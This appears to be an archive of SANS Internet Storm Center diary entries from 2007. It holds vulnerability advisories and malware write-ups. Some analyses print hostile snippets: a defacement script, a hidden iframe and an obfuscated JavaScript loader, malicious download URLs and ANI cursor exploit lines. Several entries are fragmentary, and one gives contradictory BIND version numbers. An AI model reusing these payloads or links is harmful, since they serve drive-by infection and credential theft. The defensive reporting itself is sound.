Trillian Update
The guys over at iDefense have discovered a vulnerability in Trillian, and is described as:
"Remote exploitation of multiple vulnerabilities in the Internet Relay Chat (IRC) module of Cerulean Studios' Trillian could allow for the interception of private conversations or execution of code as the currently logged on user.
When handling long CTCP PING messages containing UTF-8 characters, it is possible to cause the Trillian IRC client to return a malformed response to the server. This malformed response is truncated and is missing the terminating newline character. This could allow the next line sent to the server to be improperly sent to an attacker.
When a user highlights a URL in an IRC message window Trillian copies the data to an internal buffer. If the URL contains a long string of UTF-8 characters, it is possible to overflow a heap based buffer corrupting memory in a way that could allow for code execution.
A heap overflow can be triggered remotely when the Trillian IRC module receives a message that contains a font face HTML tag with the face attribute set to a long UTF-8 string." -- iDefense's website.
If you are running <=3.1 of Trillian, time to upgrade to 3.1.5.0.
Joel Esler
http://handlers.sans.org/jesler
Bind Version 4.9.1 is out
If you are running BIND 9.4.0, you should upgrade as soon as possible to BIND 4.9.1
BIND 4.9.1 can be downloaded from:
ftp://ftp.isc.org/isc/bind9/9.4.1/bind-9.4.1.tar.gz
A binary installer for Windows is still being worked on. It will be made available as soon as it's ready.
Happy updating!
Joel Esler
http://handlers.sans.org/jesler
0 Comments
Buffer Overflows In Adobe Products
The PNG exploit affects:
-Photoshop CS2
-Photoshop CS3
-Photoshop Elements 5.0
-Corel Paint Shop Pro 11.20
And the Bitmap exploit affects:
-Photoshop CS2The solutions for these exploits, basically, is not to open untrusted .png, .bmp, .dib, or .rle files. The possibility for remote shells and command execution do exist. So be cautious. I am sure there will be more to come.
-Photoshop CS3
Joel Esler
http://handlers.sans.org/jesler
0 Comments
Verizon having network issues in the midwest
The current estimate is 4-5 hours.
Please do not be alarmed if your connectivity to sites is affected, this is why. The Internet is not melting. (Well, today at least)
Joel Esler
http://handlers.sans.org/jesler
0 Comments
Microsoft web site compromise and partner security
There’s been a lot of discussion over the last few hours regarding a Microsoft website that apparently got defaced. While the domain name has been taken offline, the defacement itself was rather obvious. Users browsing the page were shown a typical “0wn3d by” message with a picture taken of Bill Gates during what was probably his least pleasant visit to Belgium in 1998.
The affected site displayed a remotely hosted image and the attacker’s nickname:
body onload="document.body.innerHTML='/p align=center//font size=7/Own3d by Cyber-Terrorist//font//img src=http://c2000.com/gifs!/billgates.jpg//p align=center//font size=7>--Cyb3rT--//font///p/';"//noscript/
The affected site was a subpage of ieak.microsoft.com where users could select a distribution license for the Internet Explorer Administration Kit. The server isn’t, however, located on the Microsoft network, but at a hosting partner. In addition, the source of the page mentions another third party as being responsible for the site’s development.
While the brand impact of a low-level compromise like this is negligible, it does bring up some hard questions. In this day and age of increasingly popular out and co-sourcing, how do you ensure your partners are able to meet your security requirements ? Reputation is a good starting point, while supplier audit and compliance with relevant security standards can complete the picture. Both should be part of any outsourcing RFP.
After all, while this may be a small time issue, web site defacements have in the recent past often involved malicious code distribution. Being unavailable and looking a bit silly is one thing to reflect on a brand. Being involved in the distribution of a banking fraud trojan quite another.
--
Maarten Van Horenbeeck
0 Comments
NIST publishes guidance on RFID
Last Friday, the US National Institute for Standards and Technology (NIST) published guidance on how to securely use RFID technology. SP800-98 explains RFID technology, places it in context, reviews risk involved with each of its uses and suggests mitigative controls.
It considers business process, business intelligence and privacy risk, in addition to 'external risks' such as those involved with electromagnetic radiation. The document, with its 150 pages is very detailed, and a timely release given the wide variety of potential uses for which RFID technology is now being considered.
0 Comments
Lessons Learned from MS07-017
Lessons-Learned, or follow-up is the last step in incident response. It also happens to be the most neglected step.
Hopefully, the MS07-017 patch has been safely deployed through most of your environment by now. I know not everyone has by now, and I feel your pain. For those who have, take a few moments to reflect on the event and recall how your environment performed in the early-pre-patch stages and how smoothly the transition to a post-patch state went.
- Did you have compromises?
- Did your AV detect the attacks with generic malicious-ANI or MS05-053 signatures?
- Did your IDS detect the attacks with existing signatures?
- Were you able to protect your unpatched users with content filtering?
Once you have gathered some of the data from the overall event, ask yourself:
- “How could this have gone better?”
- “Are there reasonable changes we could have made to the environment or policy to avoid impact?”
- “Were the losses acceptable?”
At the day-job we needed to tighten the detection and analysis cycle for all of the new malware that was using this vector to get into our network. This means that I’ll probably have an easier time justifying that Sandnet (http://www.lurhq.com/truman/) we’ve been planning to build. We also need to look at the amount of time it takes to block malicious URLs in our response process. We also may want to consider a different content-filtering solution.
0 Comments
The National Weather Service has issued...
Let's don't focus on your work DRP, but rather on your home one. Wait, everyone has one right? Ok no one throw anything, but yes we all need one for home. If you don't believe me, just ask the folks in Texas/Mexico who got hammered by the latest tornado or anyone who has suffered a natural disaster. For me, my work is mostly done from my home office and that is becoming more common with people. Not to mention everything related to our personal lives is becoming automated as well. When was the last time you sat and manually wrote out anything that you wanted to keep? How lost would you be if your home computer(s) were destroyed right now and without warning? We all need to approach our preparedness at home in a similar fashion to our DRP at work.
Ask yourself where your backups for your computer are sitting if you have them. If they are sitting next to you computer and your house gets destroyed, they won't help you much. Fellow handler Daniel Wesemann offered a good suggestion. The next time you head out to grandma and grandpas or maybe some friend or relatives house that is a couple of hours away, take a copy of your most recent backup and ask them to hang onto it for you.
Your backups, as well as critical personal documents, can be stored in a fireproof safe at your home for some extra protection as well. My sister and her husband actually do a really good job of this but take it a step farther. They live in a very tornado prone area of the US, so they keep all the their original documents (birth certificates, marriage license, vehicle title etc.) in a safety deposit box and only maintain certified copies of originals at their house. They also maintain an electronic copy of the brand, model and serial numbers to high value items as well as photos of all high value items too. Don't limit yourself to electronic items but also consider photos of such things as antiques, paintings etc. By doing it this way, they can back it up on to a CD and store the latest copy in the safety deposit box as well. They have everything documented for accounts, policies etc in case of an emergency.
Hopefully, no one ever has to use their home DRP, but if the worst happens, you'll be thankful that you had one. If you have any thing that you do for your home DRP that you would like to share, then please drop us an email and we'll let us know!
0 Comments
Apple QuickTime Java Handling Unspecified Code Execution
Secunia has posted an advisory today that involves Apple Quicktime Java. According to the advisory this is a highly critical problem that affects versions 3.x, 4.x, 5.x, 6.x and 7.x. The vulnerability is due to an unspecified error within the Java handling in QuickTime. This can be exploited allowing execution of arbitrary code when a user visits a malicious web site using a Java-enabled browser e.g. Safari or Firefox.
For more information see:
secunia.com/advisories/25011/
0 Comments
Microsoft Office Exploit
In a quote from the article, our own Alan Paller at Sans Institute says:
“Assaults are coming from China and perhaps other countries in the hunt for military, trade and infrastructure intelligence, says Alan Paller, research director at The SANS Institute, a security think tank. The goal: strategic advantage over the USA. "The attacks are working," says Paller. "Penetrations are deep and broad."
For more information and to read the article:
www.usatoday.com/tech/news/computersecurity/2007-04-22-cyberspies-microsoft-office_N.htm
0 Comments
New Challenge: Microsoft Office Space - A SQL With Flair
By the way, did you get the memo detailing the requirement for adding cover sheets to your TPS reports?
0 Comments
Follow the Bouncing Malware: Day of the Jackal
The real problem was that his typing skills just weren't very good. Oh sure, he could type... but he wasn't very fast, or for that matter, very accurate. It had taken him almost two hours to type out his reply to his cousin Joe in America, and even then, looking back over the message, it was filled with typing errors.
He chuckled silently to himself, reminded of an old joke: it didn't matter that he couldn't type very quickly... his cousin, Joe Sixpack, couldn't read very fast either.
Their trans-Atlantic correspondence had transitioned from the days of light-blue onionskin paper and envelopes marked “LUFTPOST/PAR AVION” into the electronic era somewhat seamlessly. He and Joe had been writing back and forth for almost twenty years now-- since both of them were in school. Joe's initial letter had arrived out of the blue-- a message from a cousin he didn't even know he had, living a different life, in a different country. They struck up a friendship and had continued to write back and forth over the years-- they seemed to have so many things in common: they each had a rather boring middle-management job, were married, had two children and were... well... both perfectly “average.” They had each gone out and purchased a computer a few years back as a family Christmas present, and had taken to communicating with each other by email. They had learned about this new technology together, swapping tips and tricks. Joe seemed to know so much about computers... he had explained in long, involved messages exactly how the Internet worked and somehow he manged to find the most amazing things out there on the 'net. He always sent Otte links to funny jokes, online games, and websites that had pictures guaranteed to make even the most worldly person blush. Otte had stored those emails away in a special folder, and even though it was late, he considered doing a little “recreational surfing” before turning in. He had heard that pornographic websites could infect your computer with some kind of virus or disease, but Joe had explained that it was all just a myth made up by left-wing feminists who wanted to keep men from looking a beautiful, naked women. Joe was always so “up” on popular culture and politics.
Otte clicked the “Send” button in his email program and imagined his message to Joe shooting through the long series of tubes that made up the Internet and appearing in Joe's in-box on the other side of the ocean. It was an amazing thing, and he always felt so “high-tech” when he sent email.
It was late, and as inviting at the thought of visiting one of Joe's “special” sites was, he decided that he should shut the machine down and head to bed. Just as he was about to turn the machine off, he heard a stupidly chipper voice announce, “Email für dich!.”
Not only did Joe read slowly, but he also typed about as fast and as well as Otte, so it couldn't be a response so soon. Otte looked at his in-box and saw a new message:
Sender: Web-Nachrichten Deutschlands [info@focus.de]
Subject: In Muenchen ist Trauer angekuendigt (“In Munich, mourning is announced”)
Otte was concerned. He clicked on the email and read the following:
Innerhalb von einer Stunde beging ein Asiater 6 brutale Morde und verschwand in der unbestimmten Richtung. Der Moerder schlich sich in ein Wohnhaus ein und schlachtete all seine Bewohner inklusive 2 kleiner zehnjaehrigen Maedchen, die heimgegangen sind. Ermordet waren auch alle Haustiere. Die Polizei ist schockiert und macht nun alles Moegliche, um diesen Taeter so schnell wie moeglich finden zu koennen. Dank einiger Passanten gibt es nun eine kurze Beschreibung des Verbrechers. Es wurde eine Belohnung angekuendigt, wenn jemand etwas zu diesem Fall mitteilen kann. Naeheres dazu sowie ein Roboterbild unter http://tanknk.dothome.co.kr
(“Within an hour a Asian national committed 6 brutal murders and vanished in an unknown direction. The murderer sneaked into an apartment house and slaughtered all of the inhabitants including two small 10 year old girls, which went home. Slaughtered also were all pets. Police is shocked and now does all possible to find the culprit as soon as possible. Because of some passerby a short description of the culprit is available. There is an reward announced for hints to the case. Details and also a robot image under...”)
“What is the world coming to?” though Otte as he re-read the message. Only last week he had read, in horror, the story of a mass killing in Virginia in the United States, and now this, right here in Germany. He had followed the details of the earlier story closely, and the parallels with this new tragedy were startling. He needed to know more, but before he clicked on the link, he wrote up a quick translation of the email and sent it off to his cousin... he just knew Joe would be as interested as he was.
Welcome to the Jungle
(OK... Once again, I find myself in the rather unenviable position of having to warn those of you whose brain waves fall a little short of the beach not to shoot yourselves in the foot. So... if you find that people are always questioning the number of angels that could dance on your head: DO NOT GO TO ANY OF THE SITES I MENTIONED IN THIS LITTLE MALWARE DECONSTRUCTION. JUST DON'T.)
Otte was going to be a bit disappointed... The link in that email wasn't going to take him to a story about a tragic mass murder in Munich, but instead to a rather uninteresting page in which free accounts at “dothome.co.kr” are described in Korean. But, buried deep within the page we find a little gift that someone placed within the HTML:
<iframe style='visibility: hidden;'width='1' height='1' src='http://203.223.158.26/africaonline/2/'>
</iframe>
Note: They hid it waaaaaay off to the right by putting a whole mess of spaces in front of it, 'cause of course no one would ever look over there. You malware dudes crack me up... I can just see 'em... eight or nine guys all sitting around some big wooden table in their Secret Underground Malware Fortress of Doom:
Malware Dude #1: Okay... so we're agreed. We'll put the link to a hidden IFRAME within an otherwise innocuous page.
Malware Dude #2: But wait! What if someone looks at the source code to that page! Won't they be able to see the HTML code that creates the hidden IFRAME?
Malware Dude #1: Drat! Our entire plan is foiled! Curse that “View Page Source” menu item! Now we'll all have to go back to our previous careers, writing high performance Visual Basic apps!
A murmur of discontent courses through the room. There is talk of suicide. Someone mentions storming Redmond and demanding that the offending “View Page Source” option be removed from IE. Then, suddenly, in a shadowy back corner, a PFY stands up, clears his throat, and, in a squeaky voice, says:
Malware PFY: Perhaps we could put a whole bunch of SPACES in front of the IFRAME code. That way it would be pushed over to the right hand side and out of sight.
Malware Dude #1: Gasp! Why... why.... that is absolutely brilliant!
Malware Dude #2: Amazing! You sir, are a freakin' genius!
A chorus of cheers and shouts fills the room. High-fives are made. Toasts to the audacity of youth fill the air. A large container filled with Gatorade is inexplicably found sitting in another corner and is promptly dumped over the PFY's head.
And there is much rejoicing.
But, I digress...
The cleverly hidden IFRAME points to a webpage within a subdirectory on a different site that is driven by some PHP code. The PHP code is designed in such a way as to exclude anyone from the fun who visits the site with anything other than IE. You see, the PHP code checks the referrer field of every request coming in, and serves up fun and interesting malware to only those who browse with IE.
Since, of course, I couldn't visit the site with IE without risking possible infection, it was impossible for me to retrieve any of the code.
Hehehehehe.....
Sometimes I crack myself up.
After blatantly lying to PHP, we retrieve the following:
<script language=JavaScript>
function makemelaugh(x){
var l=x.length,b=1024,i,j,r,p=0,s=0,w=0;
t=Array(63,42,36,33...[EDITED]...4,11,0,23);
for(j=Math.ceil(l/b);j>0;j--){
r='';
for(i=Math.min(l,b);i>0;i--,l--){
w|=(t[x.charCodeAt(p++)-48])<<s;
if(s){
r+=String.fromCharCode(170^w&255);
w>>=8;
s-=2
}else{s=6}
}document.write(r)
}
}
makemelaugh("LuLa_qN5Vvc...[EDITED]...@jWEl")
</script>
(Note: I cleaned it up a whole lot, and edited it as indicated.)
Ok... Some things of interest here:
First off, someone is obviously trying to hide something from us here. The stuff that I edited at the second spot above (the parameter being passed to the makemelaugh() function) was actually several pages of gibberish. That gibberish will get turned back into code that actually does something by the makemelaugh() function.
The second thing I noticed is that although the text of the email is in German (well... sort of... my sources tell me it's pretty crappy German), the function name here is in English: makemelaugh(). Well, LaughingBoy... let's see what you're up to.
There are SO many ways that we could pull this sucker apart. Trust me... this thing is truly the JavaScript equivalent of shoving spaces in front of IFRAME references. It'll take all of about 30 seconds of editing to make this script tell us everything it knows. When are you malware writin' guys going to learn? Obfuscating code in an interpreted language hides about as much as Paris Hilton's underwear.
In any case, shoving some well placed <textarea></textarea> statements into this code and allowing IE to take a crack at it (on an instance of VMware... really, would you expect less?) we end up with an unobfuscated script that my AV tags as “VBS/TrojanDownloader.Small.DO”:
(Note: I tried including the script here in a draft of this piece, but it kept setting off AV alerts unless I edited it down to nothing... that's what happens when the kidz end up copying from each other... so you'll just have to make do with a description...)
The downloaded script attempts to use the issue patched by Microsoft as MS06-014 “Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)” It looks to me like the script might have been based off of exploit code published as part of the Metasploit framework (no shot at HD intended... that's just what it looks like...). In this case, the vulnerability does indeed allow for code execution, and the code that gets executed is downloaded from:
http://203.223.158.26/africaonline/2/get.php?file=exe
Again, this is another PHP script that won't give anything up to a non-IE browser. But, after doing a bit more creative lying, we're graced with a download of 102,400 bytes of packed Delphi dropper goodness called “update.exe.” When executed, this drops a file called ipv6monl.dll into the windows\system32 directory and installs it by setting it up to operate as our old friend, a Browser Helper Object (BHO). Update.exe also adds several entries under:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\load
which appear to hold some sort of configuration data. Also, in order to make sure that its nefarious communication will be allowed out of your machine, it diddles with some registry entries to make sure that IE has unfettered access through the Windows firewall. Oh... and if you happened to have turned off the use of BHOs in IE, it helpfully turns them back on. How nice...
What does the LaughingBoy's BHO do? Well, from its vantage point deep inside the bowels of IE (boy... there's an icky metaphor), it captures various information about your computer and any user accounts, grabs any locally cached passwords as well as IE's autocomplete information and any passwords used by Outlook or HotMail, Oh... and if you happen to use any one of several European banks, logging into your account on a compromised machine will result in your username and password being sent off to the bad guys.
Nice, really nice.
And let's not forget that this stellar example of human ingenuity started the whole sordid mess off by exploiting a recent tragedy.
How's this for a business model:
1)Wait for tragedy to strike
2)Send mail exploiting general fear and interest in said tragedy
3)Wait for easily duped people to click on your link
4)$Profit$
LaughingBoy: You have my vote for Scumbag of the Year. Me and 35 other Handlers would like to meet you (preferably in a dark alley) so we can present you with your “award”...
Oh... BTW, LaughingBoy... 'Leet h4xor d00dz don't use MidnightCommander... if you need to install mc when you 0wn a box, you pro'lly need to do a little remedial work on your 'nix command line foo...
-------------------------------------------------------------------------------
Tom Liston - Handler on Duty
Intelguardians
P.S.: Thanks to Josef for translating. Note: The translation isn't poorly done. Josef attempted to mimic the style of the original, poorly-written German. Also, thanks to the inimitable Dr. J. for putting up with my German translation questions...
0 Comments
Jackals...
How do you people live with yourselves? How do you introduce yourselves to others? ("Hello, I make my living exploiting human tragedy.") Are you proud of what you do? At the end of the day, do you have some sense of accomplishment? Do you tell your children what you do? Your spouse? Your parents? There are so many horrible, tragic things in this world already... how can it be that the best response that you can come up with in the face of suffering is to try to turn someone else's loss into your gain?
Sometimes, I'm ashamed that I'm part of this species...
0 Comments
Safari 0day? Looks like...
-----------------------------------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)
0 Comments
Trojan posing as Codecs
http :// free-bdsm-movies. info/movies/1270174.avi
(Resolves to 85.255.119.210)
However, clicking on the link will open to another site in an iFrame:
http : //www. x-ratedclips.com/bdsm/dp/s5g2/movie1.php?bgcolor=000000&border=3C4553&id=1651
(Resolves to 81.0.250.226)
The x-ratedclips.com page has HTML code that checks for the presence of a Trojan (Zlob.Trojan). If it is not found, it will display a page to tell the viewer that the movie cannot be played and to download a "missing Video ActiveX Object".
The "activex object" link is
http: // www. amultimediasource.com/download.php?id=1651
(Resolves to 85.255.113.222)
Note: 85.255.112.0 - 85.255.127.0 is a known source of evil (http://isc.sans.org/diary.html?storyid=1811)
Not surprising, the downloaded file is actually a Trojan. Positive scan result from VirusTotal:
AntiVir 7.3.1.53 04.20.2007 DR/Zlob.Gen
AVG 7.5.0.464 04.20.2007 Downloader.Zlob.GG
BitDefender 7.2 04.21.2007 Trojan.Downloader.Zlob.RX
eSafe 7.0.15.0 04.19.2007 suspicious Trojan/Worm
Fortinet 2.85.0.0 04.21.2007 W32/Zlob.BRI!tr.dldr
Ikarus T3.1.1.5 04.20.2007 Trojan-Downloader.Win32.Zlob.bpg
Kaspersky 4.0.2.24 04.21.2007 Trojan-Downloader.Win32.Zlob.bqt
McAfee 5014 04.20.2007 New Malware.as
Sophos 4.16.0 04.20.2007 Troj/Zlob-Gen
TheHacker 6.1.6.095 04.15.2007 Trojan/Downloader.Zlob.bpl
Webwasher-Gateway 6.0.1 04.21.2007 Trojan.Zlob.Gen
0 Comments
New MS KB article (deploy DNS remote RPC block workaround)
The KB article is located at
http://support.microsoft.com/kb/936263
MSRC Blog
(Thank to Juha-Matti for sharing too)
0 Comments
port 443 / https increase
If you see attacks against https servers, please let us know and send in packet (including any web server logs if they would show an effect of the attack)
Try to limit packet submissions to "suspect" packets that either cause suspect server behaviour or trigger an IDS.
isc.sans.org/port.html
0 Comments
IRA Tax Glitch
So the issue with some banks and mutual fund companies is that customers using their web interfaces on Tuesday for IRA contributions were allowed to select 2006 as the year for which a deposit was credited. However, the back-side computers were programmed to only allow 2007 contributions after midnight the night before. So, if you made a 2006 contribution on Tuesday via a web portal or other online service, you should check to make sure that you were accurately credited for 2006 and that your contribution did not get recorded for 2007.
The next time this happens will be in April of 2012. Let's see if the computers get the word.
Marcus H. Sachs
Director, SANS Internet Storm Center
0 Comments
Malware Soup du Jour
In other cases, though, things sometimes are what they appear to be. While today investigating a malware sample coming from 81.29.241.231, I noticed that in the past month we had analyzed almost a dozen samples coming from the same 81.29.241.0/24 address range. Good enough an indication for me that putting this address range "off limits" for my systems is time well invested. The address range is located in Moscow, Russia, so unless your users are located there or do a lot of business with Moscow, chances are small that blocking the entire address range will have side effects.
0 Comments
Apple Security Announcement 2007-004
The updates can be applied via the Software Update icon in the apple menu, or downloading and installing the appropriate update available from Apple Support Downloads site.
---
Scott Fendley
ISC Handler
0 Comments
We need your help: VA Tech Domains
We setup a page with about 450 different domain names that look suspect. If you have a few minutes, help us to categorize the domains. You need to log in (so we can prevent bad input).
For details, see http://isc.sans.org/domaincheck.html .
0 Comments
Thunderbird 2.0.0.0 released
www.mozilla.org/news.html
As well, Firefox 1.5. will be supported until April 24, 2007 with security and stability updates. Time to upgrade.
www.mozilla.com/en-US/firefox/all.html
Thanks to Paul and Kevin for writing in.
Cheers,
Adrien
0 Comments
Oracle CPU
www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2007.html
Cheers,
Adrien de Beaupre
0 Comments
Blackberry Outage
and just as I posted this (8am EDT), my own T-Mobile Blackberry started to wake up and deliver email again.
Update:
RIM have acknowledged the incident, things appear operational now. Some mail delayed earlier may still be arriving now.
0 Comments
Phishers taking advantage of Virginia Tech tragedy
There has been a flurry of domain registrations related to the Virginia Tech tragedy, as reported by GoDaddy and other registrars. While some of these are undoubtedly well-intentioned organizations joining in the outpouring of support for the friends and family of the victims, others are likely to be opportunists who want to cash in on the suffering of others.
Be on the lookout for a rash of spam & phishing coming from these leeches. If you receive a plea for donations, check the organization out closely before opening up your e-gold, Paypal, Visa or other account or providing any personal information. In some cases the phishers may use voice, fax, email and websites to dupe generous and thoughtful victims into disclosing valuable information.
With any luck, these have been scooped up by cybersquatters (http://www.sans.org/newsletters/newsbites/newsbites.php?vol=9&issue=22#sID301) who will be left holding the bag when nobody is heartless enough to use the domains for unscrupulous purposes. A number of the following domains have been checked and, as of yet, contain no content:
vatechshooting.com
vatechshooting.net
vatechshooting.org
vatechshooting.info
vatechshooting.us
vatechshooting.biz
vtshooting.com
vtshooting.info
vatechmassacre.com
vatechmassacre.net
vatechmassacre.info
vatechmassacre.biz
vtmassacre.com
vtmassacre.net
vtmassacre.org
vtmassacre.info
virginiatechrampage.com
vatechrampage.com
vtrampage.com
virginiatechmurders.com
virginiatechmurders.net
virginiatechmurders.org
virginiatechmurders.info
virginiatechmurders.us
vatechmurders.com
vtmurders.com
hokieshootings.com
hokiemassacre.com
Here is a blog listing the above godaddy sites, and linking to other related blogs:
http://blog.wired.com/27bstroke6/2007/04/godaddy_registe.html#more
0 Comments
New variant of ANI (MS07-017) exploit
What a shocker - malware authors are playing cat 'n' mouse with antivirus signatures.
Roger Chiu of Malware-Test Lab submitted a .ani file observed in the wild that was not detected as malicious by any popular antivirus tools. As with many other ANI attacks, this was presented as a CURSOR object in a DIV element on a compromised web site:
<DIV style="CURSOR: url(hxxp://xxx.xxx.xxx.xxx/mcs2001/chat/css.js)"></DIV>
<DIV style="CURSOR: url(hxxp://xxx.xxx.xxx/customer/image/css.js)"></DIV>
This latest variant was submitted to the A/V community for inclusion and the site owners contacted.
Thanks, Roger.
0 Comments
New DShield Feature: Highly Predictive Blocklists.
The short one paragraph summary: The algorithm compares your submissions to others and finds groups of similar submitters. Next, it will generate blocklists based on how close you are to these other submitters.
In other simulations, these blocklists have been far superior to regular "global worst offender" or "local worst offender" lists.
For details, see http://www.dshield.org/hpbinfo.html
0 Comments
New Rinbot scanning for port 1025 DNS/RPC
We are currently tracking a new version of the Rinbot worm that in addition to its regular scans, is also scanning for port 1025/tcp. Once connected, it attempts to do a Windows 2000 DnsservQuery, likely to exploit the recent Microsoft DNS vulnerability. Detection of this virus is currently very poor, and we are working with the AV vendors to improve this.
In the meanwhile, we would like to urge you to consider implementing the workarounds discussed in our previous diary entry here.
0 Comments
New ClamAV version fixes buffer overflow vulnerability
If you're running a version of ClamAV 0.90, now is the time to upgrade to version 0.90.2, released last Friday. This version contains a fix for a buffer overflow vulnerability, CVE-2007-1997, identified by iDefense. An attacker can convince a user (or mail gateway) to scan a maliciously crafted CAB file that could lead to arbitrary code execution under the user account running the scanner.
As a temporary workaround, you could drop CAB files prior to executing the scanner. This is particulary relevant for e-mail gateways, which generally only need to allow a limited set of filetypes. The CAB format is an archive often used by Microsoft for software distribution, so on a web proxy this may be problematic.
0 Comments
Malware distributed through German-language spam mail
Eric wrote in with a new malicious message that is making the rounds in Europe. It's written in German, and contains a link to a Geocities account with an invisible iframe link. The content of one of the e-mails is below:
"Die Berliner U-Bahn Mitarbeiter fanden die Reste eines unbekannten Flugkoerpers.
Interessant findet man auch die Ermittlung von moeglichen Gruenden des
Unwohlseins einiger U-Bahn Angestellten. Nach etlichen Inspektionen wurde ein
Fremdkoerper gefunden. Wie Wissenschaftler behaupten, koennte der Koerper so
gross wie ein Bus sein. Es wurde auch vermutet, er haette seltsame Strahlen
aussenden koennen und das wegen rund um dem Rumpf gebildeter "Totzone".
Naeheres dazu unter http://geocities.com/[filtered]"
Very interesting story about an unidentified flying object and body found in the Berlin underground. The geocities URL mentioned is different in every single mail, and points to an index.html which contains a hidden iframe pointing to a server in Hong Kong, 58.65.239.106. While this host has likely been victimized, you may wish to temporarily block it on your web proxy.
That server is hosting a file update.exe which has spotty AV coverage at this time:
AntiVir 7.3.1.52 04.16.2007 HEUR/Malware
F-Secure 6.70.13030.0 04.16.2007 W32/Malware
Ikarus T3.1.1.5 04.16.2007 Trojan-Spy.Win32.Goldun.lw
Norman 5.80.02 04.14.2007 W32/Malware
Sophos 4.16.0 04.12.2007 Mal/Binder-C
VBA32 3.11.3 04.14.2007 MalwareScope.Trojan-Spy.BZub.1
Webwasher-Gateway 6.0.1 04.16.2007 Heuristic.Malware
--
Maarten Van Horenbeeck
0 Comments
Update on Microsoft DNS vulnerability
We received a couple of e-mails over the weekend asking us why this vulnerability was significant. Most public DNS servers should not be listening on the RPC ports, after all. Indeed, networks obliging to basic secure perimeter design would only allow port 53 UDP/TCP to the authorative DNS servers, and definitely not the additional RPC ports required for exploitation.
However, there are at least two design scenarios that could prove an issue:
- The many Windows servers in use at dedicated hosters. In a large number of cases, these will be single box, do-it-all type hosting machines on the Windows 2003 Web Edition platform. They would be running FTP, HTTP and DNS services, but are usually not shielded by a separate firewall.
- Active directory servers hosted on the internal network are often combined with DNS functionality. These machines are usually less protected than DMZ DNS servers, and other functionality provisioned may require the RPC ports to be available (e.g. some authentication services). If your active directory server is compromised, the game is essentially over.
Also a small update on the Microsoft advisory:
- CVE-2007-1748 is now used to track the vulnerability;
- Microsoft added to their advisory that DNS server local administration and configuration may not work if the computer name is 15 characters of longer. They suggest using the FQDN (Fully Qualified Domain Name) of the host to ensure this works correctly.
--
Maarten Van Horenbeeck
0 Comments
Gaming Malware
-----Original Message-----Many of our seasoned readers know where this is going. Unfortunately many gamers are not as aware of computer-based social engineering tricks and very likely downloaded "patch.exe" without a second thought. We downloaded the malware (it is no longer available, so happy hunting if you are looking for a sample) and ran it through VirusTotal. The results were not encouraging. The only hits we received were:
From: nospam@goteamspeak.com
Sent: Saturday, April 14, 2007 8:49 PM
To: <deleted>
Subject: New Team Speak Patch [Link Inside]
Now you can download new Team Speak patch. It will help you to use our
Team Speak servers.
We advise you to download it now
hxxp://www.goteamspeak.com/downloads/patch.exe
Antivirus Version Update Result
CAT-QuickHeal 9.00 04.14.2007 (Suspicious) - DNAScan
ClamAV devel-20070312 04.15.2007 Trojan.Spy-4392
Fortinet 2.85.0.0 04.15.2007 W32/LdPinch.BEO!tr.pws
Ikarus T3.1.1.5 04.15.2007 Trojan-PWS.LDPinch.1607
Kaspersky 4.0.2.24 04.15.2007 Trojan-PSW.Win32.LdPinch.beo
Panda 9.0.0.4 04.15.2007 Suspicious file
Webwasher-Gtwy 6.0.1 04.14.2007 Win32.Malware.gen (suspicious)
Aditional Information
File size: 48640 bytesThere was some discussion a few hours ago in the TeamSpeak forums, but currently the forums appear to be offline. We'll keep monitoring this and will post any updates if needed.
MD5: 488b22114f1a08dc68a7e2cc34bf1d01
SHA1: 3da87252c917493e591c6ea222637910fff07a5e
Marcus H. Sachs
Director, SANS Internet Storm Center
0 Comments
More info on the Windows DNS RPC interface vulnerability
So it's likely that others have been compromised as well. If you have a vulnerable MS DNS server (Wik2K SP4 or Win2003 SP1 or SP2) accessible to the Internet and don't have ports above 1024 blocked, then you may have already been targeted in an attack.
At this point, there seems to be a very small number of known compromises. We are interested if other sites have seen it? Has your IDS been alerting on shellcode for DCOM signatures and the port is above 1024? Have you seen portscans above 1024? Has your DNS.exe service died recently? (Apparently the service does not restart by itself.) If so, then let us know. And as always, if you have any packet captures of this activity please send them in.
Update: If you have a large number of domain controllers and want to automate the disabling of RPC, check out this blog entry: http://msinfluentials.com/blogs/jesper/archive/2007/04/13/turn-off-rpc-management-of-dns-on-all-dcs.aspx
0 Comments
Microsoft Vulnerability in RPC on Windows DNS Server
Microsoft has a few suggested actions that can mitigate the risk.
- Disable remote management over RPC for the DNS server via a registry key setting.
- Block unsolicited inbound traffic on ports 1024-5000 using IPsec or other firewall.
- Enable the advanced TCP/IP Filtering options on the appropriate interfaces of the server.
For more information, please see KB 935964 (Vulnerability in RPC on WIndows DNS Server Could Allow Remote Code Execution).
---
Scott Fendley
ISC Handler
0 Comments
Svchost, Microsoft Updates, and 99% CPU Usage
Is this isolated to a couple people, or is this more widespread? Then, if it is widespread, and you fixed it, how did you do it? Share your insight!
(Thank you Noah, and other readers who wished not to be named for your submission!)
(Not being a Microsoft guy myself....)
Joel Esler
Handler o' the Day
http://handlers.sans.org/jesler
0 Comments
Cisco wireless equipment vulnerabilities
- WCS apparently uses fixed and unchangeable authentication credentials on the FTP service used by the Wireless Location Appliances for backup purposes. Fixed in WCS 4.0.96.0. This is regular FTP, so these passwords can be sniffed off the network and re-used by an attacker.
- WCS suffers from a privilege escalation vulnerability that allows valid users to access information from any WCS configuration page (fixed in 4.0.81.0) or to become a member of the SuperUsers group (fixed in 4.0.87.0).
- Certain WCS directories are not password protected. This may lead to disclosure of private information such as access point location. Fixed in 4.0.66.0.
Applicable to the WLC are:
- Use of default community strings (public/private);
- The device may be crashed by sending malformed ethernet traffic;
- Some or all of the Network Processing Units within the WLC may be locked up by sending malformed traffic, including some SNAP packets, malformed 802.11 traffic or packets with unexpected length values in headers;
- WLAN ACLs could in some cases not survive a reboot.
The Cisco Aironet 1000 and 1500 lightweight access points are reported to contain a hard-coded service password. This is only available over a physical console connection, though.
--
Maarten Van Horenbeeck
0 Comments
EXE/ZIP e-mail viruses (editorial)
$unzip -l patch-58214.zip
Archive: patch-58214.zip
Length Date Time Name
-------- ---- ---- ----
40649 04-12-07 18:21 patch-58214.exe
-------- -------
40649 1 file
anyway back to the editorial ;-)...
--------------------------------------------------------------------------------------
I label this diary "Editorial", as I would like to go beyond the plain facts of the resent set of "Storm"/"nuwar"/"zhelatin" viruses.
